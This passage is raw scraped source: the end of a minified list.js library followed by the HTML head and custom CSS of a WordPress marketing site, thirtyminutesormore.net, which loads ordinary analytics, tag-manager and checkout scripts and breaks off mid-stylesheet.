f(g)}});a.register("list.js/src/filter.js",function(b,d,c){c.exports=function(e){e.handlers.filterStart=e.handlers.filterStart||[];e.handlers.filterComplete=e.handlers.filterComplete||[];return function(f){e.trigger("filterStart");e.i=1;e.reset.filter();if(f===undefined){e.filtered=false}else{e.filtered=true;var j=e.items;for(var g=0,h=j.length;g<h;g++){var k=j[g];if(f(k)){k.filtered=true}else{k.filtered=false}}}e.update();e.trigger("filterComplete");return e.visibleItems}}});a.register("list.js/src/add-async.js",function(b,d,c){c.exports=function(e){return function(h,f,g){var i=h.splice(0,100);g=g||[];g=g.concat(e.add(i));if(h.length>0){setTimeout(function(){addAsync(h,f,g)},10)}else{e.update();f(g)}}}});a.register("list.js/src/parse.js",function(b,d,c){c.exports=function(g){var f=d("./item")(g);var e=function(n){var m=n.childNodes,l=[];for(var j=0,k=m.length;j<k;j++){if(m[j].data===undefined){l.push(m[j])}}return l};var h=function(l,m){for(var j=0,k=l.length;j<k;j++){g.items.push(new f(m,l[j]))}};var i=function(j,l){var k=j.splice(0,100);h(k,l);if(j.length>0){setTimeout(function(){init.items.indexAsync(j,l)},10)}else{g.update()}};return function(){var j=e(g.list),k=g.valueNames;if(g.indexAsync){i(j,k)}else{h(j,k)}}}});a.alias("component-classes/index.js","list.js/deps/classes/index.js");a.alias("component-classes/index.js","classes/index.js");a.alias("component-indexof/index.js","component-classes/deps/indexof/index.js");a.alias("segmentio-extend/index.js","list.js/deps/extend/index.js");a.alias("segmentio-extend/index.js","extend/index.js");a.alias("component-indexof/index.js","list.js/deps/indexof/index.js");a.alias("component-indexof/index.js","indexof/index.js");a.alias("javve-events/index.js","list.js/deps/events/index.js");a.alias("javve-events/index.js","events/index.js");a.alias("component-event/index.js","javve-events/deps/event/index.js");a.alias("timoxley-to-array/index.js","javve-events/deps/to-array/index.js");a.alias("javve-get-by-class/index.js","list.js/deps/get-by-class/index.js");a.alias("javve-get-by-class/index.js","get-by-class/index.js");a.alias("javve-get-attribute/index.js","list.js/deps/get-attribute/index.js");a.alias("javve-get-attribute/index.js","get-attribute/index.js");a.alias("javve-natural-sort/index.js","list.js/deps/natural-sort/index.js");a.alias("javve-natural-sort/index.js","natural-sort/index.js");a.alias("javve-to-string/index.js","list.js/deps/to-string/index.js");a.alias("javve-to-string/index.js","list.js/deps/to-string/index.js");a.alias("javve-to-string/index.js","to-string/index.js");a.alias("javve-to-string/index.js","javve-to-string/index.js");a.alias("component-type/index.js","list.js/deps/type/index.js");a.alias("component-type/index.js","type/index.js");if(typeof exports=="object"){module.exports=a("list.js")}else{if(typeof define=="function"&&define.amd){define(function(){return a("list.js")})}else{this["List"]=a("list.js")}}})();
0
<!DOCTYPE html> <html> <head> <title></title> <!--[if lt IE 9]> <script src="https://www.thirtyminutesormore.net/wp-content/themes/storied/js/html5/dist/html5shiv.js"></script> <script src="//css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script> <![endif]--> <!--[if IE 8]> <link rel="stylesheet" type="text/css" href="https://www.thirtyminutesormore.net/wp-content/themes/storied/css/ie8.css"/> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="https://www.thirtyminutesormore.net/wp-content/themes/storied/css/ie7.css"/> <![endif]--> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta charset="UTF-8"> <link rel="stylesheet" href="https://www.thirtyminutesormore.net/wp-content/themes/storied/style.css" type="text/css" media="screen" title="no title" charset="utf-8" /> <link rel="stylesheet" href="https://www.thirtyminutesormore.net/wp-content/themes/storied/style.css" type="text/css" media="screen" title="no title" charset="utf-8" /> <meta name='robots' content='noindex,follow' /> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; //]]> </script> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="ThirtyMinutesOrMore.net &raquo; Login Comments Feed" href="https://www.thirtyminutesormore.net/login/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.thirtyminutesormore.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='haiku-style-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.css?ver=1.0.0' type='text/css' media='screen' /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.thirtyminutesormore.net/wp-includes/css/dist/block-library/style.min.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='wpda_countdown_gutenberg_css-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/widget-countdown/includes/gutenberg/style.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='bootpop-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/bootstrappopups/css/bootstrap2.min.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='bootpopc-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/bootstrappopups/css/bspopup.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesome-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/bootstrappopups/css/font-awesome.min.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-evs-css-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/wp-evs/assets/evs.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='thrive-reset-css' href='https://www.thirtyminutesormore.net/wp-content/themes/storied/css/reset.css?v=1.90' type='text/css' media='all' /> <link rel='stylesheet' id='thrive-main-style-css' href='https://www.thirtyminutesormore.net/wp-content/themes/storied/css/main_blue.css?v=1.90' type='text/css' media='all' /> <link rel='stylesheet' id='wp-add-custom-css-css' href='https://www.thirtyminutesormore.net?display_custom_css=css&#038;ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='timed-content-css-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/timed-content/css/timed-content.css?ver=2.12' type='text/css' media='all' /> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-includes/js/jquery/jquery.js?v=1.90'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-includes/js/jquery/jquery-migrate.min.js?v=1.90'></script> <script type='text/javascript'> /* <![CDATA[ */ var abPressAjax = {"ajaxurl":"https:\/\/www.thirtyminutesormore.net\/wp-admin\/admin-ajax.php","loadViaJS":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/ab-press-optimizer/js/public.js?ver=2.0.1'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/bootstrappopups/js/bootstrap.min.js?ver=5.0.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var admin_ajax = {"ajaxurl":"https:\/\/www.thirtyminutesormore.net\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/bootstrappopups/js/bspopup5.js?ver=5.0.2'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9.2'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/timed-content/js/timed-content.js?ver=2.12'></script> <link rel='https://api.w.org/' href='https://www.thirtyminutesormore.net/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.thirtyminutesormore.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.thirtyminutesormore.net/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.0.2" /> <link rel="canonical" href="https://www.thirtyminutesormore.net/" /> <link rel='shortlink' href='https://www.thirtyminutesormore.net/' /> <link rel="alternate" type="application/json+oembed" href="https://www.thirtyminutesormore.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.thirtyminutesormore.net%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.thirtyminutesormore.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.thirtyminutesormore.net%2F&#038;format=xml" /> <script type="text/JavaScript" src="https://djjcyqvteia9v.cloudfront.net/EHawkTalon.js"></script> <script type="text/javascript"> eHawkTalon(); </script><!DOCTYPE html> <html> <head> <title>div</title> </head> <style> #display { display: none; } </style> <script type="text/javascript"> </script> <body> <div id="display"> <div id="m-menu"> <nav class="menu-new-home-container"><ul id="menu-new-home" class="menu"><li id="menu-item-27513" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.thirtyminutesormore.com/who-we-are?utm_source=generic">Who We Are</a></li> <li id="menu-item-27514" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.thirtyminutesormore.com/contact-us?utm_source=generic">Contact Us</a></li> <li id="menu-item-27515" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.thirtyminutesormore.com/meet-matt-cook?utm_source=generic">Meet Matt Cook</a></li> <li id="menu-item-27516" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.thirtyminutesormore.com/meet-jonathan-green?utm_source=generic">Meet Jonathan Green</a></li> <li id="menu-item-27517" class="menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.thirtyminutesormore.com/meet-ashleigh-dunn?utm_source=generic">Meet Ashleigh-dunn</a></li> </ul></nav> </div> <div class="wp"> <div class="mobile-navbar" style="display:none;"> <button onclick="javascript:showDiv();"> <span></span> <span></span> <span></span> </button> </div> </div> </div> </body> <script type="text/javascript"> function showDiv() { x = document.getElementById('m-menu'); if (x.style.display === "none") { x.style.display = "block"; } else { x.style.display = "none"; } } </script> </html> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-NSHMHT6');</script> <script type="text/javascript">/* <![CDATA[ */ var haiku_jplayerswf_path = 'https://www.thirtyminutesormore.net/wp-content/plugins/haiku-minimalist-audio-player/js'; /* ]]> */</script> <script type='text/javascript'> var merchantId = 'CALW'; var merchantcc = '[email protected]'; var checkboxmsg = 'You must agree with the terms that are below the "Complete Your Order" button prior to completing your purchase.'; var i_am_using_a_proxy = 1; var pathToProxy = 'https://www.thirtyminutesormore.net/wp-content/plugins/handl-ultracart/rest_proxy.php'; // relative or absolute. it doesn't matter. var site_url = 'https://www.thirtyminutesormore.net'; // relative or absolute. it doesn't matter. var myItem = true; // will contain a reference to the item var myCart = true; // will contain a reference to the cart var ajax_url = 'https://www.thirtyminutesormore.net/wp-admin/admin-ajax.php'; // for ajax calls </script> <style> .et_bloom .et_bloom_popup{ z-index: 999; } .BriteVerifyErr{ padding: 10px 0; color: #000; text-align: center; } </style> <script data-cfasync="false" type="text/javascript">//<![CDATA[ dataLayer.push({"pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthor":"jpatrick"});//]]> </script> <script data-cfasync="false">//<![CDATA[ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-NSHMHT6');//]]> </script> <style type="text/css">.wp-video-shortcode { max-width: 100% !important; }body { background:#; }.cnt article h1 a { color:#; }.bSe h1, .bSe h1.entry-title, .bSe h1.entry-title a { color:#; }.bSe h2 { color:#; }.bSe h3 { color:#; }.bSe h4 { color:#; }.bSe h5 { color:#; }.bSe h6 { color:#; }.cnt article p { color:#; }.cnt .bSe article { color:#; }.cnt article h1 a { font-family: 'Archivo Narrow', sans-serif; } .cnt article h1 a {font-weight: bold;}.bSe h1 { font-family: 'Archivo Narrow', sans-serif; } .bSe h1 {font-weight: bold;}.bSe h2 { font-family: 'Archivo Narrow', sans-serif; } .bSe h2 {font-weight: bold;}.bSe h3 { font-family: 'Archivo Narrow', sans-serif; } .bSe h3 {font-weight: bold;}.bSe h4 { font-family: 'Archivo Narrow', sans-serif; } .bSe h4 {font-weight: bold;}.bSe h5 { font-family: 'Archivo Narrow', sans-serif; } .bSe h5 {font-weight: bold;}.bSe h6 { font-family: 'Archivo Narrow', sans-serif; } .bSe h6 {font-weight: bold;}#text_logo { font-family: 'Archivo Narrow', sans-serif; } #text_logo {font-weight: bold;}.cnt article h1 a { font-weight:700; }.bSe h1 { font-weight:700; }.bSe h2 { font-weight:700; }.bSe h3 { font-weight:700; }.bSe h4 { font-weight:700; }.bSe h5 { font-weight:700; }.bSe h6 { font-weight:700; }.cnt, .bp-t { font-family: 'Source Sans Pro', sans-serif; } article strong {font-weight: bold;}.bSe h1.entry-title { font-size:30px; }.cnt { font-size:20px; }.thrivecb { font-size:20px; }.out { font-size:20px; }.aut p { font-size:20px; }.cnt p { line-height:1.4em; }.thrivecb { line-height:1.4em; }.bSe a, .cnt article a { color:#; }.bSe .faq h4 { font-family: 'Source Sans Pro', sans-serif; } article strong {font-weight: bold;}header nav > ul.menu > li > a { color:#; }header nav > ul.menu > li > a:hover { color:#; }header nav > ul > li.current_page_item > a:hover { color:#; }header nav > ul > li.current_menu_item > a:hover { color:#; }header nav > ul > li.current_menu_item > a:hover { color:#; }header nav > ul > li > a:active { color:#; }</style> <script type="text/javascript"> setTimeout(function(){var a=document.createElement("script"); var b=document.getElementsByTagName('script')[0]; a.src=document.location.protocol+"//script.crazyegg.com/pages/scripts/0025/5486.js"; a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1); </script> <style type="text/css" id="sns_global_styles">@import url('https://fonts.googleapis.com/css?family=Pacifico'); @media screen and (min-width: 52em) { .centered { max-width: 52em; } } header { display: flex; padding: 1rem; background: #fff; color: rgba(0, 0, 0, 0.7); min-height: 5rem; font-size: 0.65rem; text-align: center; font-family: sans-serif; } .embed-container { border-radius: 15px; box-shadow: 1px 1px 1px 1px grey; position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden; max-width: 100%; } .embed-container iframe, .embed-container object, .embed-container embed { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } .cta { height: 200px; background-color: white; align-items: center; padding-top: 10px; align-content: center; } .animate { transition: all 0.1s; -webkit-transition: all 0.1s; animation: pulse 0.81s linear infinite alternate; -webkit-animation: pulse 0.81s linear infinite alternate; } @-webkit-keyframes pulse { 100% { transform: translateY(36.9px); } } @keyframes pulse { 100% { transform: translateY(36.9px); } } .action-button { padding: 10px 40px; margin: 0px 10px 10px 0px; position: relative; display: inline-block; border-radius: 10px; font-family: 'Pacifico', cursive; font-size: 18px; color: #FFF; text-decoration: none; } .cta-btn { background-color: orange; border-bottom: 3px solid grey; text-shadow: 0px -2px grey; } .action-button:active { transform: translate(0px,5px); -webkit-transform: translate(0px,5px); border-bottom: 1px solid; } #buttons { padding-top: 50px; text-align: center; } p { color: #666; text-align: left; margin-left: 20; margin-top: 1; margin-bottom: 25; font-family: sans-serif; } h3 { font-size: 1.2em; color: #ccc; margin-left: 20; text-align: left; font-family: sans-serif; } .cards { padding: 0em; background-color: black; border-radius: 15px; } .cards-title { height: 27px; width: 100%; padding: 0; background-color: red; text-align:center; color:white; font-family: sans-serif; font-weight: bold; font-style: italic; font-size: 14px; border-top-left-radius: 10px; border-top-right-radius: 10px; margin-bottom: 20; padding-top: 10px; } .card { background: black; margin-bottom: 20px; } .card a { color: black; text-decoration: none; padding-bottom: 20px; } .card a:hover { box-shadow: 3px 3px 8px hsl(0, 0%, 70%); padding-bottom: 20px; } .card-content { padding: 1.20em; } .card-content h3 { margin-top: -20; margin-bottom: .2em; font-weight: normal; } .card-content p { font-size: 75%; } @media screen and (min-width: 25em) { header { font-size: 1rem; } p { margin-bottom: -35; } .action-button { font-size: 25px; } .cards { margin: 1em; display: flex; justify-content: space-between; flex-wrap: wrap; } .card { margin-bottom: 1em; display: flex; flex: 0 1 calc(50% - 0.5em); padding-bottom: -5px; margin-bottom: -20px, } .cards-title { height: 17px; width: 100%; padding: 12; background-color: red; text-align:center; color:white; font-family: sans-serif; font-weight: bold; font-style: italic; font-size: 19px; border-top-left-radius: 15px; border-top-right-radius: 15px; margin-bottom: 20; } } </style> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ .bSe.fullWidth{ box-shadow: rgb(204, 204, 204) 0px 0px 1.3em 0.3em; } .bSe.fullWidth .awr p{ margin-bottom: 15px; } body.page-id-8475 p, h1, h2, h3, h4, h5, h6, span, b, u, ul, li { /* font-family:"utopia-std" !important; */ } .bSe a { color: #1155cc !important; text-decoration:underline; } ul { /* padding-left:50px !important; */ } .heading_size_increase h2 { font-size: 39px; margin: 20px 0 20px; line-height: 1em; } body.page-id-8455 h1 { font-size: 28px; margin-bottom: 15px; line-height: 1.5em; } .awr h1:nth-child(1) { line-height:1em; } /*****************/ .awr h1:nth-child(1) { line-height: 1em; font-size: 39px !important; text-align: center; color: #cc0000 !important; font-size: 39px !important; } .page-id-8517 .cnt article .awr , .page-id-8475 .cnt article .awr , .page-id-8455 .cnt article .awr , .page-id-8500 .cnt article .awr , .page-id-8528 .cnt article .awr{ max-width: 90%; margin: 0 auto; } .page-id-8517 h1 , .page-id-8475 h1 , .page-id-8455 h1 , .page-id-8500 h1 , .page-id-8528 h1 , .page-id-8517 h1 strong , .page-id-8475 h1 strong , .page-id-8455 h1 strong , .page-id-8500 h1 strong , .page-id-8528 h1 strong{ font-size: 30px !important; margin: 30px auto !important; color: #0a0a0a; line-height: 1; } .page-id-8517 .awr h3 , .page-id-8475 .awr h3 , .page-id-8455 .awr h3 , .page-id-8500 .awr h3 , .page-id-8528 .awr h3{ text-align: center; font-size: 30px !important; font-family: georgia,sans-serif !important; color: #0a0a0a; margin: 30px; line-height: 1.3; letter-spacing: 1px; } .page-id-8517 .awr p span , .page-id-8517 .awr ul li , .page-id-8517 .awr p , .page-id-8475 .awr p span , .page-id-8475 .awr ul li , .page-id-8475 .awr p , .page-id-8455 .awr p span , .page-id-8455 .awr ul li , .page-id-8455 .awr p , .page-id-8500 .awr p span , .page-id-8500 .awr ul li , .page-id-8500 .awr p , .page-id-8528 .awr p span , .page-id-8528 .awr ul li , .page-id-8528 .awr p, .page-id-9305 .awr p span, .page-id-9307 .awr p span span span, .page-id-9382 .awr p span , .page-id-9391 .awr p span , .page-id-9408 .awr p span , .page-id-9408 .awr p label { font-family: arial,sans-serif !important; line-height: 1.9 !important; color: #0a0a0a !important; } .page-id-9391 .awr p{ font-family: arial,sans-serif !important; } .page-id-9307 .awr ol li span span span{ font-family: arial,sans-serif !important; line-height: 1.9 !important; color: #0a0a0a !important; font-size: 20px !important; font-weight: 300 !important; } .page-id-9307 .bSe u{ color: #1155cc !important; text-decoration: underline; } .page-id-9307 .bSe ol, .page-id-9391 .bSe ol{ color: #000 !important; font-weight: 700; padding-left: 50px; } .page-id-9307 .awr ol ul li span span span, .page-id-9391 .bSe ol li span{ font-family: arial,sans-serif !important; line-height: 1.9 !important; color: #0a0a0a !important; font-size: 20px !important; } .page-id-9305 .awr p span span, .page-id-9307 .awr p span span span{ font-size: 20px !important; } .page-id-8517 .awr h2 b , .page-id-8475 .awr h2 b , .page-id-8455 .awr h2 b , .page-id-8500 .awr h2 b , .page-id-8528 .awr h2 b{ color: #cc0000; font-size: 27px; } .page-id-8517 .awr h2 , .page-id-8475 .awr h2 , .page-id-8455 .awr h2 , .page-id-8500 .awr h2 , .page-id-8528 .awr h2{ font-family: georgia,serif !important; margin: 0 auto; line-height: 1; margin-bottom: 4px !important; } .page-id-8517 .awr h1 , .page-id-8455 .awr h1 , .page-id-8475 .awr h1 , .page-id-8500 .awr h1 , .page-id-8528 .awr h1 , .page-id-9391 .awr h1 , .page-id-9382 .awr h1 , .page-id-9307 .awr h1 , .page-id-9305 .awr h1 , .page-id-9408 .awr h1 { font-family: georgia,serif !important; } .page-id-8517 .awr h4 , .page-id-8455 .awr h4 , .page-id-8475 .awr h4 , .page-id-8500 .awr h4 , .page-id-8528 .awr h4{ font-family: georgia,serif !important; } .page-id-8517 .awr h4 b , .page-id-8455 .awr h4 b , .page-id-8475 .awr h4 b , .page-id-8500 .awr h4 b , .page-id-8528 .awr h4 b{ text-align: left; color: #0a0a0a; } .page-id-8517 .awr p , .page-id-8475 .awr p , .page-id-8455 .awr p , .page-id-8500 .awr p , .page-id-8528 .awr p{ margin-bottom: 15px !important; line-height: 1.5; } .alignleft { float: left; /* margin: 10px 10px 20px 10px; */ } .alignnone{ margin-right: 5px; } .page-id-8517 .aligncenter , .page-id-8475 .aligncenter , .page-id-8455 .aligncenter , .page-id-8500 .aligncenter , .page-id-8528 .aligncenter{ display: block; margin: 30px auto; } .page-id-8517 .bSe ul , .page-id-8475 .bSe ul , .page-id-8455 .bSe ul , .page-id-8500 .bSe ul , .page-id-8528 .bSe ul{ padding-left: 50px !important; margin-bottom: 30px !important; } .page-id-9307 .bSe ol ul{ padding-left: 50px !important; margin-bottom: 30px !important; list-style-image: url(https://research.agorafinancial.com/reports/globalfiles/images/checkmark.png); } .page-id-8517 .bSe.fullWidth , .page-id-8455 .bSe.fullWidth , .page-id-8475 .bSe.fullWidth , .page-id-8500 .bSe.fullWidth , .page-id-8528 .bSe.fullWidth{ box-shadow: rgba(119, 119, 119, 0.45) 0px 0px 1.3em 0 } .page-id-8517 .awr h4 , .page-id-8455 .awr h4 , .page-id-8475 .awr h4 , .page-id-8500 .awr h4 , .page-id-8528 .awr h4{ margin-top: 40px; } .page-id-8517 .bSe ul , .page-id-8475 .bSe ul , .page-id-8455 .bSe ul , .page-id-8500 .bSe ul , .page-id-8528 .bSe ul{ list-style-image: url(https://research.agorafinancial.com/reports/globalfiles/images/checkmark.png); /* margin-left: 20px; */ } .page-id-8517 .brd , .page-id-8475 .brd , .page-id-8455 .brd , .page-id-8500 .brd , .page-id-8528 .brd { display: none !important; } footer a { color: #007bff; } footer a:hover { text-decoration: underline #ffffff; } #text-3 .textwidget p{ text-align: center; font-family: 'Source Sans Pro',sans-serif !important; font-size: 14px; margin-bottom: 0px; } section#text-3 .scn { margin-bottom: 0px; } @media only screen and (max-width: 1024px) and (min-width: 768px){ .awr h1:nth-child(1){ font-size: 65px !important; } } @media only screen and (max-width: 768px) { .page-id-8517 .awr h3 , .page-id-8475 .awr h3 , .page-id-8455 .awr h3 , .page-id-8500 .awr h3 , .page-id-8528 .awr h3{ font-size: 26px !important; margin: 30px 10px; } .page-id-8517 .awr h2 b , .page-id-8455 .awr h2 b , .page-id-8475 .awr h2 b , .page-id-8500 .awr h2 b , .page-id-8528 .awr h2 b{ font-size: 20px; } .page-id-8517 .awr h4 b , .page-id-8455 .awr h4 b , .page-id-8475 .awr h4 b , .page-id-8500 .awr h4 b , .page-id-8528 .awr h4 b{ font-size: 20px; } .page-id-8517 .awr h1 , .page-id-8455 .awr h1 , .page-id-8475 .awr h1 , .page-id-8500 .awr h1 , .page-id-8528 .awr h1{ font-size: 22px; } .page-id-8517 .fx-b , .page-id-8455 .fx-b , .page-id-8475 .fx-b , .page-id-8500 .fx-b , .page-id-8528 .fx-b{ background-image: none !important; } .page-id-8517 .wrp , .page-id-8455 .wrp , .page-id-8475 .wrp , .page-id-8500 .wrp , .page-id-8528 .wrp{ width: 100% !important; } .page-id-8517 .wrp ul , .page-id-8455 .wrp ul , .page-id-8475 .wrp ul , .page-id-8500 .wrp ul , .page-id-8528 .wrp ul , { padding-left: 0px !important; } .page-id-8517 .awr p , .page-id-8475 .awr p , .page-id-8455 .awr p , .page-id-8500 .awr p , .page-id-8528 .awr p{ font-size: 18px; } .alignleft { float: left; margin: 20px 20px 30px 0; } .page-id-8517 .wrp.brd ul li , .page-id-8517 .wrp.brd ul li a , .page-id-8455 .wrp.brd ul li , .page-id-8455 .wrp.brd ul li a , .page-id-8475 .wrp.brd ul li , .page-id-8475 .wrp.brd ul li a , .page-id-8500 .wrp.brd ul li , .page-id-8500 .wrp.brd ul li a , .page-id-8528 .wrp.brd ul li , .page-id-8528 .wrp.brd ul li a { color: #0a0a0a !important; } } .wpcf7-form .wpcf7-form-control-wrap input{ padding: 8px; font-size: 15px; width: 50%; } .wpcf7-form p input[type="submit"]{ padding: 10px; font-size: 15px; background: #131a1e; color: #a2a2a2; font-weight: 700; cursor: pointer; } .wpcf7-form p input[type="submit"]:hover{ color: #131a1e; background: #a2a2a2; } .wpcf7-form.invalid p label span.wpcf7-not-valid-tip{ color: #f00 !important; } .wpcf7-form-control-wrap textarea{ width: 51%; height: 30vh; } .wpcf7-form div.wpcf7-validation-errors{ border: 2px solid red; color: red; font-weight: 400; } .wpcf7-form p label{ font-weight: bold; } footer .fmm .fm-m{ text-align: center; } footer .fmm .copy{ float: none; } </style> <link href="https://fonts.googleapis.com/css?family=Oswald:400,500,600,700" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700" rel="stylesheet"> <style> .page-template-benchmark-lfsl .wrp.cnt #heading.first>span>span, .wrp cnt #heading.first>span, .page-template-benchmark-lfsl .wrp.cnt #heading.first>strong {text-transform: unset !important;}.page-template-benchmark-lfsl .wrp.cnt p#heading>span>span,.page-template-benchmark-lfsl .wrp.cnt p#heading span {text-transform: unset !important;}.page-template-benchmark-lfsl .wrp.cnt .fancy-red {text-transform: unset !important;}.page-template-benchmark-lfsl .wrp.cnt p#heading>span>span, .page-template-benchmark-lfsl .wrp.cnt p#heading span {color: #000 !important;}.page-template-benchmark-lfsl .wrp.cnt p {color: #000 !important;}.page-template-benchmark-lfsl .wrp.cnt p>span {color: #000 !important;}.page-template-benchmark-lfsl .wrp.cnt .fancy-red {color: #f62929!important;}.page-template-benchmark-lfsl .greencheck2 {margin-left: 2rem;}.page-template-benchmark-lfsla-inactive .block001 .container {background: #fff;}.page-template-benchmark-lfsl .testimonials, .page-template-benchmark-lfsla-inactive .testimonials {font-family: sans-serif;width: 95%;background-color: #ffffff;border-style: solid;border-width: 30px 40px 40px;border-color: #ffffff;-moz-border-image: url(https://www.thirtyminutesormore.net/wp-content/uploads/2018/01/teer-sheet-effect.png) 40 40 40 repeat;-webkit-border-image: url(https://www.thirtyminutesormore.net/wp-content/uploads/2018/01/teer-sheet-effect.png) 40 40 40 repeat;-o-border-image: url(https://www.thirtyminutesormore.net/wp-content/uploads/2018/01/teer-sheet-effect.png) 40 40 40 repeat;border-image: url(https://www.thirtyminutesormore.net/wp-content/uploads/2018/01/teer-sheet-effect.png) 40 40 40 repeat;}.page-template-benchmark-lfsl .awr-e, .page-template-benchmark-lfsla-inactive .cnt article .awr, body.page-template.page-template-benchmark-lfsla-inactive {background: #F3F3F3;}.page-template-benchmark-lfsl .wrp.cnt p , .page-template-benchmark-lfsl .wrp.cnt p span, .page-template-benchmark-lfsl .wrp.cnt ul.greencheck2 li, .page-template-benchmark-lfsl .wrp.cnt ul.greencheck1 li, .page-template-benchmark-lfsla-inactive .bSe.fullWidth .awr p, .page-template-benchmark-lfsla-inactive .bSe.fullWidth .awr li {color: #000;line-height: 